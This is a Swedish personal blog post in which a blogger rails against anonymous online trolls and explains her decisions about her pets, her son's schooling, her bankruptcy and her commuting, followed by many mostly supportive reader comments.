Respekt tack! Fuck off alla anonyma nättroll!

bild-2076

Foto: Linda Brolin  Hoodie Elly Pistol Skor MAGIC STEPS 

 

Just nu är jag Sur som ättika!!!!! 😡

Detta är ett LÅÅÅÅÅÅÅNGT inlägg, luta dig tillbaka om du är intresserad av MIN syn på beslut kring, stina, sture, Lilleman, Öland / Stockholm osv! Jag är riktigt trött på alla elakheter som skriv emot kring dessa ämnen!!!! Min irritation är riktad mot DESSA människor. 

-Inte mot dig som inte FÖRSÖKER behandlar mig som skit! ❤️

Senaste dagarna har jag varit konstant grinig, lipat till och från och betett mig som ett hormonellt monster! Anledningarna är flera. Först och främst att Cancern i lördags tog Johan ifrån hans familj, fru och barn. Ifrån oss! Det har jag extremt svårt att förlika mig med. Det är så j*vla orättvist!!! Johan var en riktig kämpe, en inspiratör…. en fantastisk människa och vän! Tårarna rinner när jag skriver detta. Den sorg som stackars Charlotta och barn känner kan jag inte föreställa mig.

-Fucking, JÄVLA cancer!!!!!!! 👊🏻

bild-2092

Livet är inte rättvist! JAG VET!!!!

Jag vet av väldigt många olika anledningar. Jag blev själv vuxen j*vligt snabbt. Jag har precis som alla andra ett baggage. Jag söker inte empati. Jag ber inte dig att tycka synd om mig, klia mig på ryggen och stryka mig medhårs! Men jag ber om respekt!

-RESPEKT!!!!!👊🏻

Jag har en blogg, jag har valt att bli en offentlig person. Jag köper det! Men att stampas på, ifrågasätta och om och om igen behöva förklara mig…..

-DET går mig på nerverna!

-FUCK OFF alla bittra människor som inte tänker längre än vad näsan räcker! Döm inte mig, utan att veta HELA sanningen!

Sitt inte bakom din data/mobilskärm och spy ur dig en massa påståenden och ifrågasättande kring mig som person, mamma, matte osv. UTAN grunder för det du skriver!

Jag har sagt det förut, och jag skriver det igen. Det är HELT okay att ställa en fråga, det är helt okay att inte tycka lika. Men att förtala mig, spotta och sparka på mig genom cybervärlden det är LÅNGT ifrån okay!

Om vi som bloggare bara accepterar detta och låter nät-hat och nät-mobbning pågå, vad är det då som vi förespråkar! Det är banne mig inte okay! Det ska mycket till innan jag blir arg, men idag är jag uppriktigt  sagt irriterad! Irriterad över responsen över mina katter Stina & Sture! irriterad över alla elakheter som detta medförde, och hur dessa diskussioner spårade och dessutom då föll på mig som mamma och mina beslut kring Ludvig! 

Jag har kämpat emot både det ena och det andra sedan jag var barn. Jag har stött på både med och motgångar, rest mig igen. Det har också format mig till den jag är…

stark, målmedveten och med skinn på näsan! 🙏🏻

Jag har gjort fel. Lärt mig av dessa, rest mig igen. Jag har blivit sviken, lämnad och förrådd. Rest mig upp igen. Jag har under en period inte ens haft egen bostad eller tak över huvudet, och rest mig igen. Jag har haft extrema framgångar som företagare, och sedan  förlorat ALLT, och rest mig igen!

Förra året var ett av dom tuffaste någonsin. Tre dödsfall, cancern slog till mot familje igen. Konkursen, utreseförbud… Som förändrade ALLT! Jag har lärt mig den hårda vägen att man inte kan ta NÅGON eller NÅGOT för givet! Jag har lärt mig att vara tacksam över dom små vardagliga sakerna som man ofta tar för givet. jag väljer att skratta istället för att gråta! Jag KÄMPAR!

Alla entrepenörer har begått misstag, failat och rest sig igen. Det är den hårda skolan till att bli just en framgångsrik entreprenör! OM man väljer att ta med sig sina erfarenheter och använda dom till något bra. 

Nu tillbaka till den ömma punkten som startade denna våg av bittra elaka kommentarer, mail och påhopp!

Tezz min hund. Stina & Sture. Mina ÄLSKADE ragdolls. Ludvig min lilla Mini-Me!❤️

IMG_3987

 Först och främst. När jag gick i konkurs så insåg jag DIREKT att, f*ck, detta kommer aldrig att fungera med Tezz😰

Från den dagen visste jag att det var ”lånad” tid med min älskade Tezz, ( bordercollie/schäfer blandning)

Lång historia kort.

Tezz bodde hos min sons pappa när vi träffades. Inte särskilt gammal då, det sa KLICK mellan mig och Tezz. Sedan den dagen har hon varit med mig VARJE dag. Jag startade upp My’s Blommor och hon var med mig på jobbet VARJE dag.

Vi separerade, Ludvig var nyfödd och jag hade två butiker, en grossistverksammhet och pendlade DÅ till Amsterdam, nästan varje vecka.  Vi bråkade en del om hunden och hon fick tillslut stanna hos mig. Hon fortsatte vara med mig VARJE dag på jobbet. Hon sprang lös i butiken med mig och mina anställda. Hon skapade en relation till mina stamkunder och var en väldigt omtyckt butikshund.

På den tiden pendlade jag till Holland/Amsterdam nästan varje vecka. (Med Ludvig i bärsele). Tezz levde alla hundars drömliv.

När jag var i Holland, eller på semester osv så var hon i butiken dagtid, hos tejejerna. På kvällarna hemma hos sin reservhusse som IDAG har henne.  Tryggt, lugnt och väldigt fördelaktigt för just henne.

När konkursen var ett faktum insåg jag ganska snabbt att bortsett från att min ”bebis” My’s Blommar som jag byggt upp sedan strax innan 18 års ålder just gått i graven och att det ärligt talat krossade mitt hjärta. Så skulle det få stora konsekvenser i både, ekonomi, vardag och ur praktiskt perspektiv.

Mycket riktigt.

Tezz följde med hem till Sigtuna, men när det var dags för mig att börja jobba, och plugga till PT samtidigt som jag jobbade med det bolaget som jag har kvar…. så försökte jag ha med Tezz i bilen, överallt på möten osv..

Det gick inte. Jag vände mig till ett hunddagis. Bokade plats, det sved ordentligt i min då redan, ansträngda ekonomi efter kokursen. Men jag ville SÅ gärna ha kvar Tezz, då 14 år gammal!!! Min reserv husse ringde och frågade om jag blivit galen.  ( Med all rätt! ) Tårarna rann när jag insåg HUR rätt han hade.

Vore det RÄTT av mig att låta Tezz vara på hunddagis dagtid medan jag jobbade?

Skulle hon få avsluta sin sista tid i livet med att sitta på ett hunddagis ute i en förort till Stockholm?

-NEJ!!!!!!

-TACK älskade reservhusse för att du fick mig på bättre tankar! 

Jag såg till Tezz bästa, berättade om beslutet för Ludvig och körde ner till Öland och lämnade henne hos sin reserv husse. Han är pensionär, bor på landet, känner henne mer än VÄL, och hon får springa lös på hans gård. Kunde jag erbjuda henne det? Nej!

-Tycker du att jag tog ett felaktigt beslut????????????? 

IMG_8688

Nu till Lilleman, Stina & Sture. 

Det är ett JÄVLA återkommande tjat och ifrågasättande kring min och Ludvigs situation.

Jag blev lämna när Lilleman var några veckor gammal, Otrohetsskandal… bla, bla bla, Lilleman har en bror som är lika gammal och född samma år. Det där orkar jag inte kommentera eller älta mer. Det är som det är.

Lilleman älskar sin bror och dom är bästa vänner. Du ser, inget ont som inte har något gott med sig.

Vi har kommunicerat, fokuserat på våran gemensamma nämnare Lilleman. Försökt att göra det bästa för alla inblandade. Vissa skriver till mig och ifrågasätter mig på fruktansvärda elaka och nedvärderande sätt hur jag kunde vara så  ”dum i huvudet och skaffa katter, bo i sigtuna” osv ”när Ludvig skulle börja skolan. för det skulle jag minsann veta, hur hemskt det var.”

För det första. ÅTERIGEN, tänk efter innan du känslokallt uttalar dig om sådant som du faktiskt inte vet så mycket om. Du har en övergripande bild av en situation . Du vet INTE hur det verkligen är eller har gått till.

Lilleman bodde med mig i Sigtuna. Två förskolor, två liv, två umgängeskretsar, två familjer och pendlade. Han trivdes och mådde BRA i denna situation! Vi skaffade Stina och Sture….. i min värld var vi HEMMA.

Vi skulle INTE flytta på länge, jag hade garderat mig med TVÅ extra kattvakter för eventuella semester resor osv…. Mina grannar som dagligen var hos oss. 

IMG_3931

IMG_0474

 VI började landa efter konkursen, jag mådde fruktansvärt psykiskt dåligt och tog emot hjälp för det. Jag började jobba med mig själv på ett sätt jag aldrig tidigare gjort. Min depression var djup. Obehagligt djup. Men ibland är det väl som man säger, man måste ner på botten, för att kunna börja klättra tillbaka.

I min konkurs fick jag med mig en del skulder, Då skriver en hel drös av KORKADED människor (ber om ursäkt på förhand, men vet man inte vad man pratar om och ÄNDÅ ensvist måste skriva en massa bullshit kring detta, då tycker jag att man är KORKAD, riktigt pantad! 🤦‍♀️)

Då skriver många av er ( tar bara två exempel)  ” men var det inte ett AB? ” Eller ” du skrev att det inte fanns några skatteskulder” osv…

Jag skrev nämligen det i samband med konkursen, det fanns inga skatteskulder, levskulder osv. Det gjorde heller inte det. Men konkurs var min enda utväg. Odramatisk, och ett nödvändigt ont efter ett hårt kämpande i uppförsbacke där jag ordagrant stoppade in pengar i ett svarta hål. Jag försökte allt, minskade personal, krismöten, stöttade upp med alla medel jag kunde. Tog inte ut lön från det bolaget, sålde av ALLT jag kunde. osv, osv…

Jag Sålde min mercedes, bytte den mot en skrotig begagnad skåpbil. För när det väl kommer till kritan fina du, då är materiella ting, bara ”prylar”. Jag styckade av tomter, sålde mark, hade trippla jobb  även då. Men det räckte inte hela vägen. Jag snubblade på mållinjen.

Jag förlorade mååååånga miljoner, allt jag lagt in. Både ekonomiskt, men framförallt känslomässigt. Butiken har varit min enda trygghet. i hela mitt vuxna liv, min enda ”falska” trygghet.  Där och då så förlorade jag även den. TRYGGHETEN.

Med osäkra ben har jag sedan dess försökt hitta balansen, och bygga upp en ny trygghet. INOM MIG SJÄLV!

Jag fick med mig en skuld av fastigheten som jag och banken delade på. ( Detaljerna håller vi för oss själva, helt ovesäntliga i sammanhanget) 

Detta i kombination med att jag tidigare hade gett bort ett hyresavtal på min andra butik, för att jag låg på sjukhus efter en trafikolycka ( detta var år 2012)  inte orkade en försäljning och hade utsatts för sabotage, sönderskurna däck, hot trakasserier osv..  jag pallade helt enkelt inte!  jag stängde min andra butik utan eftertanke.

-Smart? Nja… inte direkt. Det drabbade endast mig själv, ingen annan… 

 Poängen med mitt långa utlägg här är att oavsett vad DU TROR! Så har jag en del att städa upp. En del att komma ifatt med. BÅDE känslomässigt och ekonomiskt! Jag bearbetar forfarande det som har hänt. Jag mår MYCKET bättre… På alla plan. Jag drömmer fortfarande om butiken, jag saknar både den, mitt gamla liv och min fantastiska tjejer, kollegor, anställda, vänner och som för mig blev familj,(  Evelina och Vickan💖 )varje dag!

-Men livet går vidare, så även för mig!

Jag lär mig av mina misstag, jag har utvecklats något enormt sista året. Jag går fortfarande i KBT. Jag förlikar mig med det som jag inte kunnat påverka.

-Jag gör om och rätt och kommer tillbaka starkare än NÅGONSIN!!!!! 💪🏻👊🏻

Så nu tillbaka till, tiden efter konkursen, sigtuna och min och Lillemans vardag.  I min värld, så visste jag givetvis att Lilleman skulle börja förskoleklass. När Sture och sedan några veckor senare Stina flyttade hem, så var ambitionen att bo kvar. i MÅNGA år. 

Lilleman skulle enligt mig börja skolan i SIGTNA.  Jag ville ha honom hos mig. Ludvigs pappa och familj hos sig. Inte särskilt konstigt. Detta behöver man knappas vara en einstein för att kunna räkna ut! Där började nästa strid. Soc möten, familjerätt, advokater, osv. Livrädd över att förlora min son. Chanserna var 50-50. Det kunde ingen av oss sia om. Jag tyckte att fördelarna var större till mig, hans pappa större till dom… osv.

-Vem egentligen bestämmer vad som är rätt och fel?

Hur som, som du nu vet om så bestämde jag mig några dagar innan tingsrätt förhandling att göra en ”walk over”.  Lilleman önskade börja skolan med sin bror. Vad skulle jag göra?

SJÄLVKLART, satte jag mig själv, mina känslor, mina jobb, min pojkvän, min vardag, …. i andra hand. Mitt nya jobb  och min utbildning som  börjar NÄSTA vecka ( offentliggör det då) var också precis spikat när detta beslut skulle tas.

-Ångest deluxe!!!!! 

Men, Sanna mina ord, Ludvig kommer ALLTID att komma i första hand! ALLTID!

NU till nästa grej som SÅ många skriver, ni är sååå många som tycker och tänka kring detta.

”Flytta tillbaka till öland skaffa ett vanligt jobb och bo där”  

”Bo på öland, ta ett vanligt jobb” osv.. 

Jag KAN INTE TA ETT (vad ni kallar) ”vanligt” jobb! Hur många gånger ska jag behöva förklara detta? VARFÖR ska jag behöva förklara detta?

Ni tycker att man kan jobba med bloggen  där det finns internet. Jo, men tjena. Tyvärr ser verkligheten inte riiiiktigt ut så! Att jobba med min blogg,  som idag är både ett personlig varumärke men också en heltidssyssla kräver betydligt mer än bara internet. ( Det är en LÅNG historia som kräver ett eget inlägg) 

i stort sett alla förhandlingar, samarbetspartner, och jobb som JAG har kräver mig på plats i just Stockholm. Mitt nya jobb OCH studier, som jag i kombination med bloggen kommer börja nästa vecka kräver mig definitivt i Stockholm. 

Min ekonomi håller inte för ”ett vanligt” jobb på nere på öland.  INTE med MINA förutsättningar, min ekonomi och mitt liv. Jag skulle vara i personlig konkurs och bli ett socialfall på bara några veckor. HUR tråkigt det än låter så är det precis så som det ligger till!

Mitt liv, min familj, min pojkvän, min ekonomi, mina jobb, mina åtaganden… ALLT finns i Stockholm! ÄNDÅ tog jag beslutet för Lillemans skull om att flytta ner och börja veckopendlar.

Jag vet inte hur det kommer att fungera i verkligheten. Det enda jag vet är att jag sedan ett par veckor bor där nere varannan vecka och att jag pusslar och vänder UT OCH IN på mig själv för att få det att fungera!

 ( -TACK Jonas för att du stöttar MIG och beslutet! ❤️🙏🏻)

Jag trycker ihop alla fysiska möten så gott det går på min ”stockholms vecka”. Möten, plåtingar, jobb.  Jag sitter med flygtider, körschema, logistik och pusslar varje dag. Nästa vecka kommer mitt skol och jobbschema uppe på det… Men med min inställning så ska det bara gå!

Jag MÅSTE få det att fungera. Det kommer att bli på bekostnad av mig själv. Men jag ska klara av det!!!!!

Där hamnade Stina & Sture i kläm😔

Dom har bott på kattpensionat ett tag. Det har fungerat okay. Visst x-antal tusen kr i månaden, men dom hade det bra. Tills nu, när ett bekymmer dök upp. Jag skulle lämna kissarna i måndags, enligt ök skulle jag även hämta dom nästa måndag. men då jag jobbar i Frankrike i helgen, så behövde jag ha dom kvar tills på onsdag. Då var det fullbokat och dom skulle ändå behövas hämtas på måndagen. Vilket jag inte fick ihop.

Min kära Jonas påpekade att detta inte är varken första eller sista gången detta händer. Han har helt rätt. Förutom det så har dom åkt med mig i bilen mellan Stockholm/Öland.

-Är det sjysst mot dom? NEJ!!!

Sedan tänkte jag att dom skulle flyga med mig emellan, då behövde jag boka två extra bur-platser vilket heller inte är sjysst mot dom och som dessutom skulle kosta som en halv månadshyra som pricken över i. Återigen… logistik problem. OCH inte sjysst mot Stina & Sture.  Därför skrev jag att jag behövde omplacera dom. jag har försökt allt och lite till, det fungerar inte!!!!!!!

-Det är inte rätt MOT DOM!

Jag älskar mina kissar, extremt mycket! Men ännu en gång så får jag uppoffra mig själv och åsidosätta MINA känslor för att se till deras bästa! Min livssituation har förändrats och det fick konsekvenser.

Nu testar vi en grej… just för stunden. Jag håller tummar och tår för att detta ska fungera🙏🏻

När jag vet om det gör det så får du ta del av denna nya kombinerade lösning…  

Pust, suck och stön! LÅNGT inlägg, mycket känslor och lite rörigt!🙈

Men du som följer mig, vet hur JAG funkar! Ibland rinner bägaren över… det gjorde den idag! Till dig som inte är en arrogant skitstövel som anonymt sitter och försöker förpestar min vardag!

-TACK, dina stötande ord, din omtanke och cyberkram då och då gör att jag står ut med denna skit!🙏🏻🙏🏻🙏🏻❤️

Kram

/ My Martens 

bild-2068

333 Komentarer

 1. Nu djävla är det nog alla dj.som lägger näsan i andras liv låt my få lugn och ro hon gör det bästa för sin son och sina djur och det har ni inte med att göra kan ni inte peppa och ge stöd så håll tyst kram my ?❤❤❤❤

 2. Stor kram till dig! ? Alla normala människor fattar att du är en djurvän som sätter deras behov framför ert! Det måste vara ett Supersvårt beslut, men det kommer säkert bli det bästa!
  Kan tänka mig att det tär massor med allt ni bloggare får utstå, om det inte blir bättre så stäng kommentarsfältet eller granska det! Så tråkigt att läsa alla negativa kommentarer för dig!
  Fortsätt att kämpa, det kommer att bli bra för dig i slutändan! Det är jag säker på!
  Ni nättroll kan krypa in under era stenar m ert hat! ?

 3. Blir så ledsen när jag läser om hur du blir behandlad . Så tråkigt med allt näthat . Nätkärlek är så mycket bättre ❤️ Ingen mår bra av elakhet . Så nu skickar jag en stor varm cyberkram till dig . ??

 4. Tänk om alla föräldrar vore som du .
  Du ska inte behöva redogöra för allt.
  Önskar dig all lycka . Var rädd om dig , du ska hålla länge. ?

 5. Jag tycker du gör väldigt kloka beslut. Tyvärr finns det människor som alltid ska vrida och vända på allt och kritisera det man gör. Är nog inte annat än avundsjuka som driver dom tror jag. Lycka till My med ditt ”nya” liv, du kommer att lösa allt till det bästa. Kram !!

 6. Om man ska kommentera någons beslut borde det vara ”lag” på att man själv varit i samma sits.
  Ja, olyckligt med Stina och Sture men hade du fortsatt lämna dem på katthem så hade du fått pekpinnar för det med.
  Eftersom jag själv bott som du så förstår jag känslan av maktlöshet (jag kunde inte ens byta jobb när jag vantrivdes som mest för vilket annat jobb skulle godkänna att jag var på plats varannan vecka), eller känslan av att till slut inte ens packa upp sin resväska (sitt hem) för att man visste att det snart skulle ner igen.
  Som du säger så vänder man ut och in på sig själv och planerar varenda körning för att vara så effektiv som möjligt!
  Om folk bara testade att leva på det sättet så hade de fasen inte haft tid att gnälla!
  Och vet du, min son har haft en ”flängande” mamma som din Lilleman, idag är han tolv och oerhört tacksam för att det va jag som pendlade så han slapp! Lilleman kommer tacka dig!
  När du tycker att det är extra jobbigt så får du komma till oss i kalmar o sen hur bra det kan sluta! ?

 7. Hej
  Kloka beslut om än väldigt tuffa! Bra att du sätter ner foten. Vi är många som stöttar dig på olika sätt. Va rädd om dig o fortsätt fatta de beslut som är bäst för dig o dina nära både djur o människor.
  Du hittar säkert en bra lösning för Stina o Sture!
  Ta hand om dig!!

 8. Det finns alltid de som tycker tvärtom oavsett hur du gör, man kan inte göra alla nöjda. Det är DITT liv och DINA val.
  Lev ditt liv som du vill och skit i vad andra tycker! Nyttigt att kräkas av sig ibland.
  Lycka till med allt! =)

 9. Jisses! Vad är det som gör att människor hela tiden ska ”gotta” sej i andra?? Vad sitter det i? Visst kan man prata om andra människor, men varför måste det vara så elakt? ”Undrar hur den har råd med det,och den måste ju vara dum som gör si och så..” osv! Myntet har alltid två sidor och det finns troligen en anledning till beslut. Det som kan verka tokigt i andras ögon kan ju ändå vara ett självklart val i dina ögon. Man ska ju såklart inte bry sej, men ibland är det svårt att inte ta åt sej.
  Ja ja, må så gott My och va rädd om dej! Du kommer att ha mycket att tänka tillbaka på när du blir gammal;) till skillnad från tråkmånsarna som kommenterar och som troligen har dödstråkigt i sina liv? Kram??

 10. Det är kanon att du säger ifrån. Dock ska du inte behöva förklara allt. Men håller med om att en del läsare är pantade. ? Kanske My, måste man själv ha spelat dragspel å fö’låt KK för att förstå. Du verkar vara en underbar kvinna, jättefin mamma. Massor av kramar, men du: var rädd om dig❤️ Finns bara en My❤️

 11. Hej My!
  vilket inlägg du har skrivit. Du är en stark kvinna och skit i vad folk tycker och anser. Låt dem ha sina problem. Du är värd så så mkt mer. Det är modigt att berätta som du gör, du visar vilken kvinna DU är. Du kan så mkt mer än vad många andra kan. Glöm inte bort att just DU är värdefull och sträck på dig och var stolt över dig och vad du har och kan. Ta hand om dig ?.
  Kram Tina

 12. Har långt ifrån tyckt att du gjort rätt osv i diverse olika saker innan MEN nu måste jag ge dig en eloge för din kämparanda ????Alla dessa motgångar och människor emot dig! Inte rättvist alls och jag tycker genuint synd om dig! Vet själv att man inte orkar hur mkt som helst och att du står på benen är otroligt faktiskt! Tyckte själv att det var märkligt att skaffa katter osv med tanke på hur du flänger… men såklart kan saker ändra sig och precis som du säger så blir ett nytt hem bättre för dem! Vad gäller lilleman har du gjort HELT RÄTT! Han har rätt till hela sin familj ❤️ Och när skolan börjar blir klasskompisar mer och mer viktiga och så lite aktiviteter på det..Då är det svårt att få barn till att byta ort titt som tätt om du ex skulle haft honom bara på helger.. Så för honom blir det bäst! Kul för dig att du hittat kärleken – det är du värd! ❤️ Hälsn Malin

 13. Okej My.
  I dag börjar jag med en stor kram.
  Två anledningar.
  Den första är den där djävla cancern.
  Förlorade min sambo för några år sedan till elendet. Det gick fort för hon valde att avsluta det hela själv.
  Den andra är dessa djävla nättroll.
  Att dom vara orkar fegisar.
  En idiot kan se att dina katter mår bra och att du gör allt för deras bästa.
  Ludvig är som en solstråle hela tiden och med Jonas är ni båda verkligen lyckliga.
  Jag blev glad att du röt ifrån.
  Du är en fantastisk människa så bara fortsätt som du gör. Allt kommer att bli toppen
  Oj blev lite långt men ibland så rinner ordflödet på.
  Kram L

 14. Jag blir mållös! Det är fruktansvärt att du ska behöva försvara dig på detta sättet. Det är ju ingen annan än DU som vet vad som är bäst för dig, din son och djur. Varför ens läsa din blogg om man uppenbarligen inte gillar dig? Hade man gillar dig hade man ju inte hållit på såhär. Suck.
  Ta hand om dig. Ta inte åt dig av all slut som skrivs. Du vet vad som är bäst för dig. Kram

 15. Tänk om alla tänkte och gjorde som dig My. Du är en fantastisk mamma, djurvän etc. Dessa idioter som sitter och vräker ur sig gör mig så förbannad. Sålla bort, slå dövörat till och lev ditt liv precis så som DU vill. Idioter finns det gott om, men vi är många fler vid din sida som stöttar dig! Stor kram

 16. All heder åt dig som tänker först och främst på din son och dina djur❤❤❤❤ tyvärr så gör inte alla det och det är mycket tydligt när man läser de otroligt korkade uttalanden som vissa ”troll” vräker ur sig…..

 17. Att dom orkar. Dom kan inte ha det lätt med så mycket fritid så att dom har så mycket tid över att svinga dynga till höger och vänster.
  Alla gör fel beslut ibland, för det är man ingen sämre människa.
  Du är stark nu My! Du har en fin son och man vid din sida. Strunta i pöbeln och va lycklig! Det är du värd ❤

 18. Fina My. Skickar massor med kramar genom cybervärlden.? det är bara du som kan leva ditt liv. Vi andra får leva våra egna liv.? sköt om dig nu och din lille vapendragare?

 19. Hej My.
  Tycker du är oerhört klok och mogen i dina beslut med allt vad som händer i ditt liv. Du är fantastisk tycker jag som roddar runt allt på bästa sätt. Och som sagt det bästa för dig och din son här och nu. Bara du kan veta vad som är det rätta beslutet för er. Du är oegostisk som alltid tänker på alla runtom dig först. Hoppas verkligen du får massa kärlek och lycka omkring dig. Det är du verkligen värd.
  Och fy skäms på er alla besserwisser som har så mycket åsikter hur My ska göra. Stötta henne istället och visa henne respekt istället.
  Stor Kram på dig Nu och fortsätt tro på att du gör det bästa för dig och din familj
  Pernilla från Täby

 20. Ville bara titta in och säga att det är tragiskt att du måste förklara för folk varför du gör si eller så. Och att dessutom få kritik i svåra val/situationer. ? Vad är det som händer m mänskligheten?
  Ditt liv, dina val!
  Tro på dig själv, kram! ?

 21. Oj vilket inlägg, kan riktigt känna hur det kokade i dig när du skrev det.
  Du är en sann djurvän o kissarna ser så fina o välskötta ut. Fatttar inte varför folk ska döma så. Hade det varit pga allergi du behövt omplacera så hade det inte blivit sånt rabalder. O livssituationen kan ju ändras för vem som helst liksom…. Jag tänker på hur många djurägare det finns som tyvärr inte tar tag i o omplacerar sitt djur när levnadsförhållanden ändras utan istället låter det/dem leva i misär. Har sett mycket sånt bla genom mitt jobb. Sådant gör mig mer än förbannad.
  Så du tar ju bara ditt ansvar, även om det inte var så du hade tänkt dig från början. Hoppas du hittar det bästa hemmet som kommer ge dem massor av kärlek?

  • Ja Pernilla… du har helt rätt… jag älskar mina kissar <3 SÅÅÅÅ mycket!!!! jag knake har en kombinerad lösning… v i testar just nu. Jag önskar verkligen att det ska fungera! TACK! kram <3

 22. Du är säkert en jättefin människa och det har väl inte undgått nån att du varit genom ett helvete och behövt växa upp väldigt tidigt. Men ändå… du visste väl för fasiken att sonen skulle börja i skolan? Trodde du på fullaste allvar att han pappa bara skulle nöja sig med att träffa honom på helger? Och mitt i detta skaffa TVÅ katter? Och plugga till PT? För att nu börja plugga till nått annat? Mycket verkar du ha men förmågan att ta genomtänkta beslut? Nja.

  • Söta rara Lilla Malin. Ludvig skulle börjat skolan i Sigtuna, förutsättningarna förändrades. Har budkapet gått fram till dig? Ska jag skriva med stora bokstäver, vill du komma hem hit till Täby och diskutera saken, kika på papper, överenskommelser och dialoger som förekommit. Välkommen!

  • Till Malin!
   O här har vi en ”Malin” som förmodligen bor på Öland. Hur visste du att barnet skulle börja skolan? Förmodligen för att du känner familjen, det är ju uppenbart med tanke på hur du skriver.
   Nu är det så här Malin. Rent juridiskt har inte en pappa ägande rätt till hur en situation ska se ut när man har ett gemensamt barn, ni är många som tycks tro att det är pappan som ägt avgörandet i sin hand. Så är det inte! Mamman har EXAKT lika stor rätt som en pappa att säga sitt om livssituationen för ett gemensamt barn. Jag är fullständigt övertygad om att My hade vunnit i en domstolsförhandling o utslaget hade säkerligen blivit att barnet har rätt att gå i en skola hos mamman där hon väljer att bo, där hon har sin försörjning. Mamman hade haft en klar fördel i förhållande till pappan eftersom hon bara har 1 barn, och pappan har flertal barn.
   My har sitt jobb o sin framtid i Stockholm, en domstol hade aldrig kunnat säga till My att hon måste sänka sina ekonomiska krav och ta ett ”vanligt jobb” nere i Småland. Ingen domstol äger rätten att bestämma över människors inkomst eller var de ska bosätta sig.
   My valde själv att ta ett EGET beslut att låta sonen gå i skolan här för att kunna ha sitt syskon i samma skola, det har hon ju själv skrivit om här.
   Så håll käften på er idioter som sitter och skriver här o har åsikter om saker ni inte vet ett skit om. Ska jag berätta om varför ni sitter här o skriver skit, jo för att ni lider av den obotliga sjukan som kallas ”AVUNDSJUKA”. Ryck upp er och gå o kamma till er lite istället!

 23. Jag lever ett totalt annat liv än ditt, jag har frågor ibland o svårt att förstå vissa av dina val men jag har alltid försökt att ställa sakliga frågor i förhoppning att jag ska få bättre insikt o därmed förståelse. Jag blir så innerligt ledsen för din skull att du får så mycket skit som du säger!! Bloggen borde vara fylld med pepp o heja-rop, vara ett glädjepiller o en plats för dig att också få energi! Bort med alla haters o låt värme, glädje o gemenskap vara ledorden på din blogg! Lycka till med allt o jag ser fram emot att följa din höst o din framtid!

 24. Nu djävla är det nog alla dj.som lägger näsan i andras liv låt my få lugn och ro hon gör det bästa för sin son och sina djur och det har ni inte med att göra kan ni inte peppa och ge stöd så håll tyst kram my 🤗❤❤❤❤

 25. Stor kram till dig! 💕 Alla normala människor fattar att du är en djurvän som sätter deras behov framför ert! Det måste vara ett Supersvårt beslut, men det kommer säkert bli det bästa!

  Kan tänka mig att det tär massor med allt ni bloggare får utstå, om det inte blir bättre så stäng kommentarsfältet eller granska det! Så tråkigt att läsa alla negativa kommentarer för dig!

  Fortsätt att kämpa, det kommer att bli bra för dig i slutändan! Det är jag säker på!

  Ni nättroll kan krypa in under era stenar m ert hat! 😩

 26. Hej! Jag följer en del bloggar och brukar inte kommentera men kan inte låta bli. Livet förändras och går upp och ner och vi möter motgångar, hur man hanterar och möter dem definierar dig och formar dig och oss alla till förhoppningsvis mera insiktsfulla personer. Att ta dessa svåra beslut tyder bara på att du stark, att du sätter ditt barn främst är osjälviskt, det är så många som glömmer bort barnen i tvister och bara fokuserar på sitt egna behov.
  Att du ändå drömmer och vill något mer är inte fel, vi har bara ett liv och vi ska inte sluta leva eller ta vara på möjligheterna men du var rädd om dig, bränn inte ut dig!
  // Carina

 27. Hej My!
  Ge inte dessa troll någon uppmärksamhet. Det är ditt liv som ingen annan har med att göra. Du gör det som är bäst för dig och de dina. Ignorera i stället för att mata dem. Du är fantastisk och du ger mig mycket inspiration trots att jag är mycket äldre än du. Kom ihåg att du är värdefull. Lev ditt liv som du vill och njut av det.
  Stor kram
  Mua

 28. Hej My!
  Ge inte dessa troll någon uppmärksamhet. Det är ditt liv som ingen annan har med att göra. Du gör det som är bäst för dig och de dina. Ignorera i stället för att mata dem. Du är fantastisk och du ger mig mycket inspiration trots att jag är mycket äldre än du. Kom ihåg att du är värdefull. Lev ditt liv som du vill och njut av det.
  Stor kram
  Mia

 29. Kämpa på My! Många av de som kommenterar negativt skulle troligtvis inte kunna åstadkomma hälften av de du gör i ditt liv. Du är en förebild som stark och driftig kvinna för din son. Du ska vara stolt. All styrka till dig!

 30. Blir så ledsen när jag läser om hur du blir behandlad . Så tråkigt med allt näthat . Nätkärlek är så mycket bättre ❤️ Ingen mår bra av elakhet . Så nu skickar jag en stor varm cyberkram till dig . 🌸💜

 31. Tänk om alla föräldrar vore som du .
  Du ska inte behöva redogöra för allt.
  Önskar dig all lycka . Var rädd om dig , du ska hålla länge. 🌺

 32. Jag tycker du gör väldigt kloka beslut. Tyvärr finns det människor som alltid ska vrida och vända på allt och kritisera det man gör. Är nog inte annat än avundsjuka som driver dom tror jag. Lycka till My med ditt ”nya” liv, du kommer att lösa allt till det bästa. Kram !!

 33. Om man ska kommentera någons beslut borde det vara ”lag” på att man själv varit i samma sits.
  Ja, olyckligt med Stina och Sture men hade du fortsatt lämna dem på katthem så hade du fått pekpinnar för det med.
  Eftersom jag själv bott som du så förstår jag känslan av maktlöshet (jag kunde inte ens byta jobb när jag vantrivdes som mest för vilket annat jobb skulle godkänna att jag var på plats varannan vecka), eller känslan av att till slut inte ens packa upp sin resväska (sitt hem) för att man visste att det snart skulle ner igen.
  Som du säger så vänder man ut och in på sig själv och planerar varenda körning för att vara så effektiv som möjligt!
  Om folk bara testade att leva på det sättet så hade de fasen inte haft tid att gnälla!

  Och vet du, min son har haft en ”flängande” mamma som din Lilleman, idag är han tolv och oerhört tacksam för att det va jag som pendlade så han slapp! Lilleman kommer tacka dig!
  När du tycker att det är extra jobbigt så får du komma till oss i kalmar o sen hur bra det kan sluta! 🙂

 34. Jag blir så trött av att ni bloggare ska behöva förklara er hela tiden. Det är väl bara att sluta läsa och följa bloggen om den inte passar dig.
  Fortsätt vara du ❤

 35. Hej

  Kloka beslut om än väldigt tuffa! Bra att du sätter ner foten. Vi är många som stöttar dig på olika sätt. Va rädd om dig o fortsätt fatta de beslut som är bäst för dig o dina nära både djur o människor.

  Du hittar säkert en bra lösning för Stina o Sture!
  Ta hand om dig!!

 36. Det finns alltid de som tycker tvärtom oavsett hur du gör, man kan inte göra alla nöjda. Det är DITT liv och DINA val.
  Lev ditt liv som du vill och skit i vad andra tycker! Nyttigt att kräkas av sig ibland.

  Lycka till med allt! =)

 37. My, länge sedan jag kommenterade. Sist var när du kämpade med konkurs osv.
